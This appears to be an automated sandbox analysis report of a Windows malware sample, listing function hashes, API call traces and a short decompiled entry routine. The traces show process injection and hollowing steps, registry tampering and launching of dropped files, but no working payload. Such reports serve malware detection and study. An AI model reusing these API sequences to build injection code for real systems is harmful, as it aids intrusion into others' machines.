  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E144C, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 49 Total matches: 9memory
Similarity
  • Total matches: 9
  • API ID: HeapFreeStrStrI
  • String ID: pnls
  • API String ID: 4137399961-141991303
  • Opcode ID: 4aa7b909af106ac1487055971ad23c5d9ff314578936fa2f1abc21ea428e854d
  • Instruction ID: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
  • Opcode Fuzzy Hash: E6D095824D6F9B47C9517014971DE702580FF430D3D9B726405C1434515F00301F1D1D
  • Instruction Fuzzy Hash: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
APIs
    • Part of subcall function 002E47D3: memcpy.NTDLL(00000004,?,?,?,00000000), ref: 002E48C3
  • HeapFree.KERNEL32(00000000,?,?), ref: 002E14BE
    • Part of subcall function 002E3D12: GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C), ref: 002E3D27
    • Part of subcall function 002E3D12: GetSystemDefaultUILanguage.KERNEL32(?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C,?,?,?,002E1800,00000000,?,002E7494), ref: 002E3D31
  • StrStrIA.SHLWAPI(00000000,002E7494), ref: 002E14A4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
